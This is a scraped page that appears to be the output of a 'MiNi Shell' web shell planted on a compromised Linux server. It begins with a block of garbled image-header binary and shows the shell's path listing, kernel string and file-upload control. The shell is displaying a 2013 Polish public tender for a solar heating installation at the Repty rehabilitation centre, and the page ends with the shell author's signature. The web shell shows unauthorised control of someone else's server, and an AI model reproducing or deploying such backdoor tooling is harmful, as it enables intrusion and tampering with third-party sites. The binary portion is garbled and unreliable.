JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20130116/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20130116/22214-N-2013.html

<p class="kh_header"><b>Tarnowskie Góry: Wykonanie Instalacji Układu Solarnego GCR/3/ZP/2013</b><br>
<b>Numer ogłoszenia: 22214 - 2013; data zamieszczenia: 16.01.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> SP ZOZ "Repty" Górnośląskie Centrum Rehabilitacji im. gen. Jerzego Ziętka , ul. Śniadeckiego 1, 42-604 Tarnowskie Góry, woj. śląskie, tel. 032 3901206, faks 032 3901353.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.repty.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie Instalacji Układu Solarnego GCR/3/ZP/2013.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiot zamówienia stanowi wykonanie instalacji solarnej dla potrzeb podgrzewu wody basenowej i wody  dla  gabinetu hydroterapii.
2. Panele słoneczne połączone  w układzie 4 pól,  po 10 kolektorów zainstalowane zostaną na dachu budynku pawilonu E przy wykorzystaniu konstrukcji wsporczej, zwiększającej pochylenie kolektorów do 30o.
3. Zadanie obejmuje w szczególności:
wykonanie robót według przedstawionego projektu budowlanego,
przeprowadzenie rozruchu,
przeszkolenie obsługi oraz opracowanie szczegółowej instrukcji eksploatacji,
przedłożenie protokołów badań, prób i sprawdzeń.
4. Szczegółowy opis robót zawiera dokumentacja techniczna tj:
- Instalacja solarna dla wody basenowej i działu hydroterapii,
- Zabezpieczenie instalacji solarnej przed przegrzewem,
- Roboty budowlane uzupełniające wynikające z zakresu projektów branżowych,
- Specyfikacja techniczna wykonania i odbioru robót,
- Przedmiary robót,
- Ekspertyza techniczna budynku w aspekcie zamontowania na nim instalacji solarnej.
5. Zgodnie z dokumentacją, instalacja  zostanie wykonana przy zabudowie 40 kolektorów słonecznych  typu Vitosol 100w 2.5 lub odpowiednik o parametrach technicznych nie gorszych niż typowane, charakteryzujących się wysoką sprawnością pracy dla podgrzewania ciepłej wody użytkowej, bezpieczeństwem eksploatacji i żywotnością, co musi być potwierdzone testami jakościowymi zgodnie z normą europejską i polską PN-EN-12975 oraz posiadanym certyfikatem Solar Keymark.
6. Na wykonane roboty Wykonawca zobowiązany jest udzielić Zamawiającemu co najmniej 60 miesięcznej gwarancji z tym, że dla materiałów i zainstalowanych urządzeń okres ten nie może być krótszy niż gwarancja udzielana przez producenta zainstalowanych urządzeń i wykorzystanych materiałów.

Informacje dodatkowe:
1. Przedmiot umowy powinien być wykonany zgodnie z dokumentacją i z materiałów określonych w projekcie (w trakcie realizacji przedmiotu umowy wymagane będą: atesty, certyfikaty, deklaracje zgodności, aprobaty techniczne ITB), a także z uwzględnieniem obowiązujących przepisów prawa mających zastosowanie z uwagi na specyfikę przedmiotu zamówienia, w szczególności przepisy Kodeksu cywilnego, Prawa budowlanego oraz Prawa zamówień publicznych.
2. Wszystkie prace należy wykonać zgodnie z obowiązującymi normami i przepisami. Należy stosować wyłącznie materiały dopuszczone do stosowania w budownictwie, posiadające wymagane prawem certyfikaty i atesty, w szczególności dopuszczone do zastosowania w budynkach użyteczności publicznych. Wszystkie materiały i wyroby należy stosować zgodnie z instrukcjami i wytycznymi producenta.
3. Wykonawca odpowiada za prawidłowe wydzielenie i oznakowanie terenu robót budowlanych, mając na uwadze ciągłość pracy pozostałych części szpitala. Miejsce prowadzenia robót winno być  zabezpieczone przed dostępem osób trzecich i oddzielone od pozostałych części obiektu, będących w użytkowaniu, szczelnymi ściankami. Roboty ogólno-budowlane należy prowadzić w sposób niezakłócający pracę w GCR Repty. Roboty hałaśliwe prowadzone będą wyłącznie w terminie i w czasie uzgodnionym wcześniej  z  Działem Technicznym Zamawiającego.
4. Wykonawca we własnym zakresie zobowiązany jest zorganizować zaplecze budowy, które może powstać jedynie w miejscu uzgodnionym z Zamawiającym. Pomieszczenia socjalne oraz magazynowe zapewnia Wykonawca.
5. Od Wykonawcy wymagać się będzie zapewnienia na terenie objętym umową należytego ładu, porządku, przestrzegania zasad BHP i p.poż, przepisów sanitarno - epidemiologicznych w czasie wykonywania robót oraz odpowiedzialności za szkody powstałe w związku z realizacją robót oraz wskutek innych działań osób zatrudnionych przez Wykonawcę.
6. W celu prawidłowego sporządzenia oferty Wykonawca powinien dokonać wizji terenu robót oraz uzyskać wszelkie informacje niezbędne do oceny ryzyka, trudności i wszelkich innych okoliczności jakie mogą wystąpić w trakcie realizacji zamówienia. 
7. Prawidłowość obmiarów zawartych w przedmiarze robót Wykonawca ma obowiązek sprawdzić w oparciu o otrzymaną SIWZ z załącznikami oraz wizję terenu robót. O rozbieżnościach pomiędzy obmiarami Wykonawcy a Zamawiającego, Wykonawca jest zobowiązany niezwłocznie powiadomić Zamawiającego przy wykorzystaniu procedury udzielania wyjaśnień w sposób opisany w SIWZ pkt .  XI.   
8. Osobą odpowiedzialną za organizację i przebieg wizji jest Zdzisław Wojtas tel. 32 39-01-550 w godz. 8-14.
9. Wykonawca do realizacji zamówienia zobowiązany jest używać wyłącznie materiałów i urządzeń dopuszczonych do stosowania na terenie Polski, spełniających  właściwe normy.
10. Szczegółowy harmonogram robót, stanowiący załącznik do umowy będzie ustalony z Wykonawcą przed podpisaniem umowy, w którym zostaną zawarte terminy rozpoczęcia i zakończenia zadań. 
11. Wykonawca zobowiązany będzie do stosowania się do procedur i zasad wynikających z posiadania przez Zamawiającego certyfikatów jakości wg ISO 9001 - ISO 14001 i certyfikatu akredytacyjnego.
12. Zamawiający zastrzega, że wszystkie wskazane z nazwy materiały (wyroby) w dokumentacji projektowej i przedmiarze robót należy rozumieć, jako określenie wymaganych parametrów technicznych lub standardów jakościowych. Oznacza to, że w przypadku wskazanych z nazwy materiałów i wyrobów Zamawiający dopuszcza zastosowanie równoważnych materiałów (wyrobów), co nie może prowadzić do zmiany projektu oraz zmniejszenia parametrów technicznych i jakościowych założonych w projekcie. Ciężar udowodnienia, że materiał (wyrób) jest równoważny w stosunku do wymogu określonego przez Zamawiającego, spoczywa na składającym ofertę (art. 30 ust. 5 Pzp). W takim wypadku Wykonawca musi przedłożyć w ofercie odpowiednie dokumenty opisujące parametry techniczne, wymagane prawem certyfikaty i inne dokumenty dopuszczające dane materiały (wyroby) do użytkowania oraz pozwalające jednoznacznie stwierdzić, że są one rzeczywiście równoważne..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.30.00.00-0, 09.33.11.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.04.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Zamawiający żąda od Wykonawców wniesienia wadium  w wysokości 17.000 zł.
2. Wadium wnosi się przed upływem terminu składania ofert.
3. Wadium może być wnoszone w jednej lub w kilku następujących formach:
a)   pieniądzu,
b)  poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
c) gwarancjach bankowych,
d)  gwarancjach ubezpieczeniowych,
e) poręczeniach udzielanych przez podmioty, o których mowa w art.6b ust.5 pkt 2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.
4. Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy Zamawiającego w  ING Bank Śląski nr konta  92 1050 1386 1000 0002 0085 6649 z dopiskiem Wadium GCR/3/ZP/2013. Wniesienie wadium w pieniądzu będzie skuteczne, jeżeli znajdzie się na rachunku bankowym Zamawiającego w terminie do godz. 11.00 dnia 31.01.2013r.
5. Wadium wnoszone w innych dopuszczonych przez Zamawiającego formach należy dołączyć do oferty w oryginale w sposób umożliwiający jego późniejszy zwrot, bez naruszania oferty, a do oferty trwale dołączyć kopię dokumentu potwierdzoną za zgodność z oryginałem.
6. Wykonawcy, którzy nie wnieśli wadium do upływu terminu składania ofert zostaną wykluczeni z postępowania o udzielenie zamówienia na podstawie art. 24 ust 2 pkt 2 Pzp.
7. Zamawiający zwraca wadium zgodnie z postanowieniami art. 46 ustawy Pzp. W ofercie należy podać numer konta, na jakie Zamawiający dokonuje zwrotu wadium.
8. Zamawiający, zgodnie z art. 46 ust. 4a ustawy Pzp, zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust 3, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie.
9. Zamawiający, zgodnie z art. 46 ust. 5 ustawy Pzp, zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:
a) odmówi podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w     ofercie,
    b) zawarcie umowy  w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek ten zostanie spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich pięciu  lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał co najmniej trzy  prace związane z montażem instalacji układu solarnego o wartości nie mniejszej od kwoty 250.000,00 zł brutto każda.5. Ocena spełniania warunków udziału w postępowaniu, o których mowa w art. 22 ust 1 ustawy Pzp, zostanie dokonana wg formuły spełnia - nie spełnia, na podstawie analizy załączonych do oferty dokumentów potwierdzających spełnianie ww. warunków udziału w postępowaniu. Niespełnienie przez Wykonawcę chociażby jednego z warunków określonych podmiotowo skutkować będzie wykluczeniem Wykonawcy z udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek ten zostanie spełniony, jeżeli Wykonawca wykaże, iż dysponuje co najmniej 12 osobami zatrudnionymi przy bezpośredniej realizacji zamówienia o kwalifikacjach instalacyjnych i ogólnobudowlanych, w tym .: 
	a) 2 osobami posiadającą uprawnienia budowlane do pełnienia samodzielnych funkcji technicznych w budownictwie, która przedłoży zaświadczenie o wpisie na listę członków właściwej izby samorządu zawodowego z uiszczeniem aktualnych składek członkowskich (zgodnie z art. 19 ust 3 ustawy o samorządzie zawodowym architektów, inżynierów budowlanych oraz urbanistów), w branży:
- konstrukcyjno - budowlanej: 1 osoba,
- instalacyjnej :1 osoba,
b) 10 osobami zatrudnionymi przy bezpośredniej realizacji zamówienia o kwalifikacjach   zawodowych w branży ogólnobudowlanej,  instalacyjnej.5. Ocena spełniania warunków udziału w postępowaniu, o których mowa w art. 22 ust 1 ustawy Pzp, zostanie dokonana wg formuły spełnia - nie spełnia, na podstawie analizy załączonych do oferty dokumentów potwierdzających spełnianie ww. warunków udziału w postępowaniu. Niespełnienie przez Wykonawcę chociażby jednego z warunków określonych podmiotowo skutkować będzie wykluczeniem Wykonawcy z udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek ten zostanie spełniony, jeżeli Wykonawca wykaże, że posiada opłacone ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności zgodnej z przedmiotem niniejszego zamówienia na wartość co najmniej 250.000,00 zł .5. Ocena spełniania warunków udziału w postępowaniu, o których mowa w art. 22 ust 1 ustawy Pzp, zostanie dokonana wg formuły spełnia - nie spełnia, na podstawie analizy załączonych do oferty dokumentów potwierdzających spełnianie ww. warunków udziału w postępowaniu. Niespełnienie przez Wykonawcę chociażby jednego z warunków określonych podmiotowo skutkować będzie wykluczeniem Wykonawcy z udziału w postępowaniu.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a).  formularz oferty wg wzoru stanowiącego załącznik nr 2;
b). pełnomocnictwo do podpisywania dokumentów, składania wyjaśnień oraz oświadczeń woli, jeżeli ofertę podpisuje pełnomocnik Wykonawcy, w formie oryginału lub kserokopii poświadczonej notarialnie,
c).  wykaz części zamówienia, których wykonanie zostanie powierzone podwykonawcom (zał. nr 7),
d). pisemne zobowiązanie innych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia w przypadku, gdy Wykonawca polega na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączącego go z nimi stosunków,
e). kosztorys ofertowy sporządzony zgodnie z przedmiarem robót ujętym w SIWZ i zatwierdzony przez  osobę/osoby upoważnione do składania oświadczeń woli w imieniu Wykonawcy zgodnie z zasadą reprezentacji,
f). w przypadku zaoferowania materiałów (wyrobów) równoważnych należy przedłożyć dokumenty opisujące parametry techniczne, wymagane prawem certyfikaty i inne dokumenty dopuszczające dane materiały (wyroby) do użytkowania oraz pozwalające jednoznacznie stwierdzić, że są one rzeczywiście równoważne.
g) certyfikat SOLAR KEYMARK potwierdzający zgodność kolektora  z normą jakościową EN-12975.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość zmiany ustaleń zawartej umowy w stosunku do treści oferty Wykonawcy w następującym zakresie :
1. terminu realizacji robót budowlanych w przypadku wystąpienia opóźnień wynikających z:
a)  okoliczności leżących po stronie Zamawiającego w szczególności:
trudności w dostępie do pomieszczeń, w których przewidziane są prace z uwagi na to, że zadania stanowiące przedmiot  umowy wykonywane będą podczas nieprzerwanego udzielania świadczeń zdrowotnych przez Zamawiającego,
wstrzymania robót przez Zamawiającego,
b) wystąpienia istotnych wad skutkujących koniecznością dokonania poprawek lub uzupełnień, jeżeli uniemożliwia to lub istotnie wstrzymuje realizację określonego rodzaju robót mających wpływ na zmianę terminu realizacji zamówienia,
c) działania siły wyższej (np. klęski żywiołowe), mające bezpośredni wpływ na terminowość wykonywania robót,
d)  wystąpienia okoliczności, których strony umowy nie były w stanie przewidzieć, pomimo zachowania należytej staranności,
   e)  zmiany umowy dotacji.
Dokonanie ww. zmian jest możliwe po uzyskaniu zgody, wyrażonej na piśmie przez Zamawiającego.
2.  W przedstawionych w pkt. 2.1 przypadkach opóźnień, strony ustalą nowe terminy, z tym że maksymalny okres przesunięcia terminu zakończenia realizacji przedmiotu umowy równy będzie okresowi przerwy lub przestoju. Przesunięcie terminu będzie musiało być szczegółowo uzasadnione przez stronę która o to wnosi  i zaakceptowane przez drugą ze stron.
3.  W trakcie trwania umowy oraz w okresie gwarancji Wykonawca zobowiązuje się do pisemnego powiadamiania Zamawiającego o:
a) zmianie siedziby lub nazwy firmy,
b) zmianie osób uprawnionych do  reprezentacji  podmiotu,
c) ogłoszeniu upadłości,
d) ogłoszeniu likwidacji,
e) zawieszeniu działalności,
f) wszczęciu postępowania układowego, w którym uczestniczy Wykonawca.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.repty.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Samodzielny Publiczny  Zakład Opieki Zdrowotnej REPTY Górnośląskie Centrum Rehabilitacji            im. Gen. Jerzego Ziętka 
ul. Śniadeckiego 1,     42 - 604 Tarnowskie Góry.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 31.01.2013 godzina 11:00, miejsce: Samodzielny Publiczny  Zakład Opieki Zdrowotnej REPTY Górnośląskie Centrum Rehabilitacji            im. Gen. Jerzego Ziętka 
ul. Śniadeckiego 1,     42 - 604 Tarnowskie Góry.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com